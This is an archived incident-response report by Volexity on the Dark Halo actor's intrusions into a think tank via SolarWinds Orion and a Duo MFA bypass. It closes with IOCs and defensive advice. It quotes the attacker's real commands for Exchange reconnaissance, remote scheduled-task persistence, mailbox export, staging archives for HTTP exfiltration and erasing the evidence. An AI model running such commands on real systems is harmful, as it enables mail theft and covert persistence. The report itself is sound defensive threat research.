{ "id": "2ff418d3-28bc-4b7c-8242-fa211eb09a28", "created_at": "2026-04-06T00:18:08.875776Z", "updated_at": "2026-04-10T03:37:32.830176Z", "deleted_at": null, "sha1_hash": "038a84ed65cb51ecb3a435dbfc4e793d7789dde6", "title": "Dark Halo Leverages SolarWinds Compromise to Breach Organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 837924, "plain_text": "Dark Halo Leverages SolarWinds Compromise to Breach\r\nOrganizations\r\nBy mindgrub\r\nPublished: 2020-12-14 · Archived: 2026-04-05 16:44:04 UTC\r\nVolexity is releasing additional research and indicators associated with compromises impacting customers of the\r\nSolarWinds Orion software platform. Volexity has also published a guide for responding to the SolarWinds\r\nbreach, and how to detect, prevent, and remediate this supply chain attack.\r\nOn Sunday, December 13, 2020, FireEye released a blog detailing an alleged compromise to the company\r\nSolarWinds. This compromise involved a backdoor being distributed through an update to SolarWind’s Orion\r\nsoftware product. FireEye attributed this activity to an unknown threat actor it tracks as UNC2452. Volexity has\r\nsubsequently been able to tie these attacks to multiple incidents it worked in late 2019 and 2020 at a US-based\r\nthink tank. Volexity tracks this threat actor under the name Dark Halo.\r\nAt one particular think tank, Volexity worked three separate incidents involving Dark Halo. In the initial incident,\r\nVolexity found multiple tools, backdoors, and malware implants that had allowed the attacker to remain\r\nundetected for several years. After being extricated from the network, Dark Halo then returned a second time,\r\nexploiting a vulnerability in the organization’s Microsoft Exchange Control Panel. Near the end of this incident,\r\nVolexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 1 of 9\n\naccess the mailbox of a user via the organization’s Outlook Web App (OWA) service. Finally, in a third incident,\r\nDark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020.\r\nThe primary goal of the Dark Halo threat actor was to obtain the e-mails of specific individuals at the think tank.\r\nThis included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its\r\ninvestigations are directly related to the FireEye report based on overlap between command-and-control (C2)\r\ndomains and other related indicators such as a backdoored server running SolarWinds Orion.\r\nMajor Incidents\r\nVolexity has worked three major incidents involving the Dark Halo threat actor. In most cases, the actor aimed to\r\nlive off the land, primarily focusing on weekly operations to extract e-mail messages from the organization. Dark\r\nHalo did use malware and red-teaming tools but largely only for specific one-time tasks as a fallback mechanism\r\nwhen other avenues of access were cut off. For the purposes of this write-up, Volexity will share novel and useful\r\ninformation from the second and third incidents. The second incident involved a sophisticated way to obtain\r\nunauthorized access to an account via OWA that had MFA protection in place. The third incident involved a\r\nbreach by way of the SolarWinds Orion platform.\r\nBypassing Multi-Factor Authentication\r\nToward the end of the second incident that Volexity worked involving Dark Halo, the actor was observed\r\naccessing the e-mail account of a user via OWA. This was unexpected for a few reasons, not least of which was\r\nthe targeted mailbox was protected by MFA. Logs from the Exchange server showed that the attacker provided\r\nusername and password authentication like normal but were not challenged for a second factor through Duo. The\r\nlogs from the Duo authentication server further showed that no attempts had been made to log into the account in\r\nquestion. Volexity was able to confirm that session hijacking was not involved and, through a memory dump of\r\nthe OWA server, could also confirm that the attacker had presented cookie tied to a Duo MFA session named duo-sid.\r\nVolexity’s investigation into this incident determined the attacker had accessed the Duo integration secret key\r\n(akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the\r\nduo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined\r\nit to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass\r\nthe MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores\r\nthe need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be\r\nchanged following a breach. Further, it is important that not only are passwords changed after a breach, but that\r\npasswords are not set to something similar to the previous password (e.g., Summer2020! versus Spring2020! or\r\nSillyGoo$e3 versus SillyGoo$e2).\r\nSolarWinds\r\nIn the third incident, which took place in July 2020, Volexity identified suspicious administrative commands and\r\nActiveSync anomalies in the organization’s Exchange environment. Further review of the organization’s endpoint\r\nsoftware and network traffic confirmed a breach. The attacker had executed commands to export e-mail for\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 2 of 9\n\nspecific users in the organization, and then exfiltrated the data via the organization’s Outlook Web Anywhere\r\n(OWA) server.\r\nMany of the technical details regarding the malware used are covered in the FireEye notification. However, in this\r\nblog, Volexity can share examples of command-line actions the attacker took after gaining access to the target\r\nnetwork and provide insight into additional tools, infrastructure, and attacker objectives.\r\nReconnaissance\r\nThe attacker was quite adept with Exchange and immediately listed various organization configuration settings via\r\nPowerShell. Below are a few of the operations that the attacker executed.\r\nGet a list of users on the Exchange server and their current role using Get-ManagementRoleAssignment:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “Get-ManagementRoleAssignment -GetEffectiveUsers | select\r\nName,Role,EffectiveUserName,AssignmentMethod,IsValid | ConvertTo-Csv -NoTypeInformation | %\r\n{$_ -replace ‘`n’,’_’} | Out-File C:\\temp\\1.xml”\r\nRetrieve information about the configured Virtual Directory using Get-WebServicesVirtualDirectory:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “Get-WebServicesVirtualDirectory | Format-List”\r\nThe attacker also made use of a file called sqlceip.exe, which upon first glance might appear as the legitimate\r\nversion of SQL Server Telemetry Client provided by Microsoft. However, Volexity determined this tool was\r\nactually a version of AdFind from joeware.net. AdFind is a command-line tool used for querying and extracting\r\ndata from Active Directory. During the course of its investigations, Volexity discovered the attacker using AdFind\r\nwith the following command line:\r\nC:\\Windows\\system32\\cmd.exe /C sqlceip.exe -default -f (name=”Organization Management”) member\r\n-list | sqlceip.exe -f objectcategory=* \u003e .\\SettingSync\\log2.txt\r\nLateral Movement\r\nThe attacker used PowerShell to create new tasks on remote machines:\r\n$scheduler = New-Object -ComObject\r\n(“Schedule.Service”);$scheduler.Connect($env:COMPUTERNAME);$folder =\r\n$scheduler.GetFolder(“\\Microsoft\\Windows\\SoftwareProtectionPlatform”);$task =\r\n$folder.GetTask(“EventCacheManager”);$definition =\r\n$task.Definition;$definition.Settings.ExecutionTimeLimit =\r\n“PT0S”;$folder.RegisterTaskDefinition($task.Name,$definition,6,”System”,$null,5);echo “Done”\r\nThey also attempted this on a number of machines using schtasks.exe directly. For example:\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 3 of 9\n\nC:\\Windows\\system32\\cmd.exe /C schtasks /create /F /tn\r\n“\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager” /tr\r\n“C:\\Windows\\SoftwareDistribution\\EventCacheManager.exe” /sc ONSTART /ru system /S\r\n[machine_name]\r\nExfiltration\r\nThe attacker exfiltrated e-mail data from targeted accounts using the New-MailboxExportRequest command\r\nfollowed by Get-MailboxExport-Request command. In this case, the attacker was only interested in mail received\r\nthis year.\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “New-MailboxExportRequest -Mailbox foobar@organization.here -ContentFilter {(Received -ge\r\n’03/01/2020′)} -FilePath ‘\\\u003cMAILSERVER\u003e\\c$\\temp\\b.pst'”\r\nThe attacker created password-protected archives on the victims’ OWA server so that they could be exfiltrated via\r\na simple HTTP request.\r\nC:\\Windows\\system32\\cmd.exe /C .\\7z.exe a -mx9 -r0 -p[33_char_password]  “C:\\Program\r\nFiles\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Redir.png” C:\\Temp\\b.pst‍‍‍\r\nAn example URL for the attacker to collect the exfiltrated data would be:\r\nhttps://owa.organization.here/owa/auth/Redir.png\r\nOn disk, this was located at the following path:\r\n\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\r\nVolexity also saw the attacker stage other exfiltration in another folder on the server located here:\r\n\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\\r\nFinally, the attacker added their own devices as allowed IDs for active sync for a number of mailboxes using Set-CASMailbox:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “Set-CASMailbox -Identity \u003cUserID\u003e -ActiveSyncAllowedDeviceIDs @{add=’XXXXXXXXXXXXX’}”\r\nAttacker Cleanup\r\nAfter successfully exporting mail they wished to steal, the attacker would remove the evidence of the export\r\nrequest using Remove-MailboxExportRequest:\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “Get-MailboxExportRequest -Mailbox user@organization.here | Remove-MailboxExportRequest -\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 4 of 9\n\nConfirm:$False”\r\nAttacker Infrastructure\r\nDuring the July 2020 incident, Volexity observed at least two indicators that overlapped with indicators of\r\ncompromise posted by FireEye. The organization’s SolarWinds server conducted DGA-style DNS queries under\r\nthe following subdomain:\r\nappsync-api.us-west-2.avsvmcloud[.]com\r\nThe vast majority of queries were met with SERVFAIL responses. In most other cases, the hostnames resolved to\r\nIPs that fell in the ranges 184.72.0.0/16, 20.141.48.0/24, 8.18.144.0/24, and 8.18.145.0/24. However, the critical\r\nresponses to the organization came by way of CNAME responses that occurred between June 30, 2020, and July\r\n16, 2020. These DNS resolutions returned a CNAME for the domain freescanonline[.]com. In late July, the\r\nattacker took advantage of their access and started moving laterally throughout the organization, which will be\r\ndescribed a bit later. Most notably the attacker pushed malware to other systems that beaconed back to the\r\nfollowing additional infrastructure:\r\nlcomputers[.]com\r\nwebcodez[.]com\r\nAt the time of the incident (July 2020), the attacker had accidentally configured their servers to be open to the\r\nInternet, accepting arbitrary requests on port 80. Since then, the attacker has fixed this issue; however, at the time,\r\nVolexity was able to identify a number of C2 addresses based on server profiling.\r\nSpecifically, at the time there were only a handful of servers that responded with the following HTTP headers in\r\nthe following order:\r\nTransfer-Encoding\r\nConnection\r\nServer\r\nX-Powered-By\r\nDate\r\nThe “Server” value also specified IIS10.0, but this header order does not match the order used by IIS 10.0.\r\nBased on this pattern Volexity was able to identify the following IP addresses in July 2020:\r\n13.57.184.217\r\n13.59.205.66\r\n18.217.225.111\r\n18.220.219.143\r\n3.16.81.254\r\n3.87.182.149‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍\r\n34.219.234.134\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 5 of 9\n\n54.193.127.66\r\n54.215.192.52\r\nThese IPs hosted SSL certificates for the following domains:\r\ndeftsecurity[.]com\r\ndigitalcollege[.]org\r\nfreescanonline[.]com\r\nglobalnetworkissues[.]com\r\nkubecloud[.]com\r\nseobundlekit[.]com\r\nsolartrackingsystem[.]net\r\nthedoccloud[.]com\r\nvirtualwebdata[.]com\r\nNotably, some of these domains were set up prior to the earlier known compromise date published by FireEye,\r\nsuch as solartrackingsystem[.]net, which was assigned its current nameserver in January 2020. Several of the\r\ndomains also have very long registration histories going back several years. Volexity believes that attacker\r\nobtained these domains through auctions or from registrants after they expired but before they were deleted. This\r\nallowed the attacker to use domains with a long history and avoid being detected based on detections tied to a\r\ndomain being newly registered.\r\nConclusion\r\nAt the time of the investigation, Volexity deduced that the likely infection was the result of the SolarWinds box on\r\nthe target network; however, it was not fully understood exactly how the breach occurred (i.e., whether there was\r\nsome unknown exploit in play, or other means of access), therefore Volexity was not in a position to report the\r\ncircumstances surrounding the breach to SolarWinds. The machines involved in this incident had been rebooted\r\nseveral times prior to Volexity’s involvement in incident response efforts, meaning that a great deal of evidence\r\nthat would have been in volatile memory had been lost.\r\nVolexity believes that Dark Halo is a sophisticated threat actor based on the following characteristics of their\r\nattacks:\r\nGenerally, the attacker displayed a reasonable level of operational security throughout the attack, taking\r\nsteps to wipe logs for various services used and to remove evidence of their commands from infected\r\nsystems.\r\nThe server profile used to identify the C2 domains was only visible for a snapshot in time, where the\r\nattacker likely became aware that their C2 addresses could be identified in this way, they went on to secure\r\ntheir C2 servers further.\r\nDespite an ongoing campaign lasting one year, very few files related to this attacker have made their way\r\nto VirusTotal.\r\nDuring the investigation Volexity discovered no hints as to the attacker’s origin or any links to any publicly known\r\nthreat actor.\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 6 of 9\n\nTo protect against these attacks, Volexity recommends the following:\r\nLook for traffic to any of the related malicious domains identified in Appendix A.\r\nFollow the advice from SolarWinds in their response to this incident.\r\nUse the signatures provided by FireEye to identify related activity.\r\nEnsure that all secret keys associated with MFA or other sensitive integrations are reset following a breach.\r\nMake sure all credentials in an organization, including service accounts, are reset following a breach and\r\nthat default passwords or those similar to previous passwords are not used.\r\nIf you run an on-premise Exchange environment, consider adding alerting mechanisms to any EDR\r\nsolutions for processes using the Exchange Management Shell PowerShell cmdlets listed in Appendix B.\r\nThis may or may not be a valid detection approach depending on how frequently this is used within your\r\norganization.\r\nMore generally, if the Exchange Management Shell is rarely used in a legitimate Administrative context, it\r\nmay be worth investigating any historical use of this shell.\r\nAppendix A – IP and Domain IOCs\r\n13.57.184.217\r\n13.59.205.66\r\n18.217.225.111\r\n18.220.219.143\r\n196.203.11.89\r\n3.16.81.254\r\n3.87.182.149\r\n3.87.182.149‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍\r\n34.219.234.134\r\n54.193.127.66\r\n54.215.192.52\r\navsvmcloud[.]com\r\ndeftsecurity[.]com\r\ndigitalcollege[.]org\r\nfreescanonline[.]com\r\nglobalnetworkissues[.]com\r\nkubecloud[.]com\r\nlcomputers[.]com\r\nseobundlekit[.]com\r\nsolartrackingsystem[.]net\r\nthedoccloud[.]com\r\nvirtualwebdata[.]com\r\nwebcodez[.]com\r\nAppendix B – Exchange Management Shell Powershell cmdlets\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 7 of 9\n\nGet-AcceptedDomain\r\nGet-CASMailbox\r\nGet-Mailbox\r\nGet-ManagementRoleAssignment\r\nGet-OrganizationConfig\r\nGet-OwaVirtualDirectory\r\nGet-Process\r\nGet-WebServicesVirtualDirectory\r\nNew-MailboxExportRequest\r\nRemove-MailboxExportRequest\r\nSet-CASMailbox\r\nAppendix C – DGA Domain Resolutions\r\n184.72.1.3\r\n184.72.101.22\r\n184.72.113.55\r\n184.72.145.34\r\n184.72.209.33\r\n184.72.21.54\r\n184.72.212.52\r\n184.72.224.3\r\n184.72.229.1\r\n184.72.240.3\r\n184.72.245.1\r\n184.72.48.22\r\n20.141.48.154\r\n8.18.144.11\r\n8.18.144.12\r\n8.18.144.130\r\n8.18.144.135\r\n8.18.144.136\r\n8.18.144.149\r\n8.18.144.156\r\n8.18.144.158\r\n8.18.144.165\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 8 of 9\n\n8.18.144.170\r\n8.18.144.180\r\n8.18.144.188\r\n8.18.144.20\r\n8.18.144.40\r\n8.18.144.44\r\n8.18.144.62\r\n8.18.144.9\r\n8.18.145.131\r\n8.18.145.134\r\n8.18.145.136\r\n8.18.145.139\r\n8.18.145.150\r\n8.18.145.157\r\n8.18.145.181\r\n8.18.145.21\r\n8.18.145.3\r\n8.18.145.33\r\n8.18.145.36\r\nSource: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nhttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" ], "report_names": [ "dark-halo-leverages-solarwinds-compromise-to-breach-organizations" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434688, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/038a84ed65cb51ecb3a435dbfc4e793d7789dde6.pdf", "text": "https://archive.orkl.eu/038a84ed65cb51ecb3a435dbfc4e793d7789dde6.txt", "img": "https://archive.orkl.eu/038a84ed65cb51ecb3a435dbfc4e793d7789dde6.jpg" } }